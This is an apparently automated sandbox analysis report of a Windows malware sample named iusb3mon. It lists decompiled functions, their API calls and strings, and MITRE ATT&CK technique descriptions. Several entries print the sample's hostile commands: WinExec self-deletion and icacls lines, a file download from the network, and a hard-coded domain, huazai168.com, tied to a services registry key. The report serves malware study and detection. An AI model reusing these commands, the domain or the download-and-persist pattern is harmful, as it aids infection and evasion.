GetCPInfo.KERNEL32(?,?), ref: 0629E2D4

Strings

, xrefs: 0629E31D
, xrefs: 0629E2F9

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 9c76c46e935f7a061749dc7d0b5d2b83f311d434c7d3a2a7234d2ce18119956e
Instruction ID: 78d02f713747fee07dba8bcf659d16f51f76749b4dc59459d62fce63d173ae00
Opcode Fuzzy Hash: 9c76c46e935f7a061749dc7d0b5d2b83f311d434c7d3a2a7234d2ce18119956e
Instruction Fuzzy Hash: B74197304242681EEF55C624EC4DBFA7FAD9F81710F0914E4DACACA192C2784644DFB3

Function 06294498 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72processCOMMON

Download Yara Rule

APIs

Part of subcall function 06296316: DeleteFileA.KERNEL32(?,062944DD,00000000,00000001), ref: 06296344
Part of subcall function 06296316: LoadLibraryA.KERNEL32(wininet.dll), ref: 06296357
Part of subcall function 06296316: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0629636E
Part of subcall function 06296316: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0629638E
Part of subcall function 06296316: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 0629639A
Part of subcall function 06296316: FreeLibrary.KERNEL32(00000000), ref: 062963BC

Part of subcall function 062995BC: GetFileAttributesA.KERNEL32(06295CC4,06295CC4,00000000), ref: 062995C0
Part of subcall function 062995BC: GetLastError.KERNEL32 ref: 062995CB

CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06294519

Strings

WinSta0\Default, xrefs: 06294512
D, xrefs: 062944FC

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressFileLibraryProc$AttributesConnectCreateDeleteErrorFreeInternetLastLoadProcess
String ID: D$WinSta0\Default
API String ID: 1472976565-1101385590
Opcode ID: 58c51932de7090d1b49b413b942db993bad8efa217db242c2b758731aad06708
Instruction ID: 7b818d1ce14aa6444d3a0767f6e4f287c15db89c3262819ab2915068deaecb51
Opcode Fuzzy Hash: 58c51932de7090d1b49b413b942db993bad8efa217db242c2b758731aad06708
Instruction Fuzzy Hash: 4801C4B39212162BDF90B6E49C04EEF77ECDF85361F14442AFE06E6041EA74964586F1

Function 06295C32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71filenetworkCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 06295C98
URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 06295CAE

Part of subcall function 062995BC: GetFileAttributesA.KERNEL32(06295CC4,06295CC4,00000000), ref: 062995C0
Part of subcall function 062995BC: GetLastError.KERNEL32 ref: 062995CB

Part of subcall function 06295AA1: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 06295AEA
Part of subcall function 06295AA1: RegQueryValueA.ADVAPI32(00000000,00000000,?,06295CD7), ref: 06295B09
Part of subcall function 06295AA1: RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 06295B14
Part of subcall function 06295AA1: wsprintfA.USER32 ref: 06295B3C
Part of subcall function 06295AA1: RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 06295B5C

Strings

c:\%s, xrefs: 06295C92

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileOpenwsprintf$AttributesCloseDownloadErrorLastQueryValue
String ID: c:\%s
API String ID: 2251979229-3279930864
Opcode ID: 9a17b853a9a058161bfd9241d2c1441c399b4e0d1160c80c3cf2913f3f9c34e4
Instruction ID: 7afba8867df69e8658d8672e506540fa08d66442297191128ba7db42e51050ba
Opcode Fuzzy Hash: 9a17b853a9a058161bfd9241d2c1441c399b4e0d1160c80c3cf2913f3f9c34e4
Instruction Fuzzy Hash: C1110A32A243153AEFA1A6A49C88FDB775CDF84350F140475FE15F1081EB749A4586B1

Function 0629708C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,06296C72,?,?,?,huazai168.com), ref: 062970E9

Strings

huazai168.com, xrefs: 0629709C
SYSTEM\CurrentControlSet\Services\, xrefs: 062970B3

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Open
String ID: SYSTEM\CurrentControlSet\Services\$huazai168.com
API String ID: 71445658-1872475541
Opcode ID: 014fe78c6dc03b6112f551f5aef06665124921c42569b711514a27856c852a26
Instruction ID: 3e385c5cc5a56fd65b8e579fbe787cdb13f6f88bdb8daf52cbb126fbfbf4e68a
Opcode Fuzzy Hash: 014fe78c6dc03b6112f551f5aef06665124921c42569b711514a27856c852a26
Instruction Fuzzy Hash: 1CF08276A682187BEB90D6B4DC46FE9736CDB54740F1008A1ABD5F1081EEF0A6D88A61

Function 00341280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00341285

Part of subcall function 00343A15: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00343A21

___std_exception_copy.LIBVCRUNTIME ref: 003412AE

Strings

string too long, xrefs: 00341280

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 1846318660-2556327735
Opcode ID: f3b3fb56c5a0e7c152e0ccb29e99cfbdadb3b540a4b275908b045b716b179cd7
Instruction ID: c36b84d4829a2d3c3df56077d6c47d934f2bb61ab2d3a34380aa496fb221353c
Opcode Fuzzy Hash: f3b3fb56c5a0e7c152e0ccb29e99cfbdadb3b540a4b275908b045b716b179cd7
Instruction Fuzzy Hash: 74E0CD7251031857C615FFD4DC01C81B7DCDE16711710C626F684EB601FA70B64087E5

Function 06293FAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6processCOMMON

Download Yara Rule

APIs

Part of subcall function 06293DF2: WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone",00000000), ref: 06293E0C
Part of subcall function 06293DF2: WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06293E14
Part of subcall function 06293DF2: DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06293E1B
Part of subcall function 06293DF2: Sleep.KERNEL32(c:\del,?,?), ref: 06293E38
Part of subcall function 06293DF2: Sleep.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06293E4B
Part of subcall function 06293DF2: WinExec.KERNEL32(C:\ProgramData\Microsoft\del.bat,00000000), ref: 06293E53
Part of subcall function 06293DF2: Sleep.KERNEL32(000003E8,?,?), ref: 06293E5A
Part of subcall function 06293DF2: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 06293E6A
Part of subcall function 06293DF2: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 06293E83
Part of subcall function 06293DF2: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?), ref: 06293E9A

WinExec.KERNEL32(cmd /c echo.>c:\del & exit,00000000), ref: 06293FBA
ExitProcess.KERNEL32 ref: 06293FC2

Strings

cmd /c echo.>c:\del & exit, xrefs: 06293FB5

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Exec$Sleep$FileName$DeleteEnvironmentExitModulePathProcessShortVariable
String ID: cmd /c echo.>c:\del & exit
API String ID: 253100718-3921158289
Opcode ID: 3c26e76eb6cce7c3ca930f33ad8eca06834ae4c0791b26b00f048970a4723c91
Instruction ID: d865b9865064057666e40bf761c09eeb042f703a7bddfb87cd54b6ee92ca0b35
Opcode Fuzzy Hash: 3c26e76eb6cce7c3ca930f33ad8eca06834ae4c0791b26b00f048970a4723c91
Instruction Fuzzy Hash: 47B092302A0302A7D2802AA0BC5FF582A11A780B42F45A410FB45984C08AD000015A21

Function 0629F4EE Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,0629F2B6,00000000,00000000,00000000,0629AD29,00000000,00000000,06298D56,00000000,00000000,00000000), ref: 0629F516
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,0629F2B6,00000000,00000000,00000000,0629AD29,00000000,00000000,06298D56,00000000,00000000,00000000), ref: 0629F54A
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0629F564
HeapFree.KERNEL32(00000000,?), ref: 0629F57B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 52bd1739a9818f921429dfafb81ea915b09b5f11983234591db08d93f8c1aa41
Instruction ID: 42b93d28c8c37de66fa75fa029f29a00cb16f3af5207225ad8867f3231f6a182
Opcode Fuzzy Hash: 52bd1739a9818f921429dfafb81ea915b09b5f11983234591db08d93f8c1aa41
Instruction Fuzzy Hash: F11128706007019FDBA08F19FD899667FF7FBC47207108A19EA92D69E0D3B89986DF11

Function 062AC9FF Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(062C6740,?,00000000,?,?,062AC8E5,00000010,?,00000100,?,?,?,062AC4A4,062AC4EB,062AC4D2,062A87DA), ref: 062ACA3A
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,062AC8E5,00000010,?,00000100,?,?,?,062AC4A4,062AC4EB,062AC4D2,062A87DA), ref: 062ACA4C
LeaveCriticalSection.KERNEL32(062C6740,?,00000000,?,?,062AC8E5,00000010,?,00000100,?,?,?,062AC4A4,062AC4EB,062AC4D2,062A87DA), ref: 062ACA55
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,062AC8E5,00000010,?,00000100,?,?,?,062AC4A4,062AC4EB,062AC4D2,062A87DA,00000100), ref: 062ACA67

Part of subcall function 062AC9BA: GetVersion.KERNEL32(?,062ACA0F,?,062AC8E5,00000010,?,00000100,?,?,?,062AC4A4,062AC4EB,062AC4D2,062A87DA,00000100,062A8773), ref: 062AC9CD

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 48d70bc0f19dd7647b503c19bab87b7090d3fc467dbfba35306586ea0302895d
Instruction ID: 4597f90c17a34320fbe0959b9dd9bbe97066b32b18cbb6f78a5c4ac54fd7a9ae
Opcode Fuzzy Hash: 48d70bc0f19dd7647b503c19bab87b7090d3fc467dbfba35306586ea0302895d
Instruction Fuzzy Hash: 76F08C7151131BDFC750EF54F8C8962B3ABFB04326B00043ADB4192002D779E40ADE92

Function 0629CF5F Relevance: 5.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,0629CD22,?,0629B623), ref: 0629CF6C
InitializeCriticalSection.KERNEL32 ref: 0629CF74
InitializeCriticalSection.KERNEL32 ref: 0629CF7C
InitializeCriticalSection.KERNEL32 ref: 0629CF84

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 2ec595421a4c7720c9bab86f2ba5c0facbbeb2d81a55256bdd9922df59540421
Instruction ID: 24fe458225d2b9febefecdc4cd9274f2f0e3d03158bfd886266d3d63686485f8
Opcode Fuzzy Hash: 2ec595421a4c7720c9bab86f2ba5c0facbbeb2d81a55256bdd9922df59540421
Instruction Fuzzy Hash: 1EC0E931901778AACB512B55FC0C8893F67EB043E03129062A6945107086691D55EFC1

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
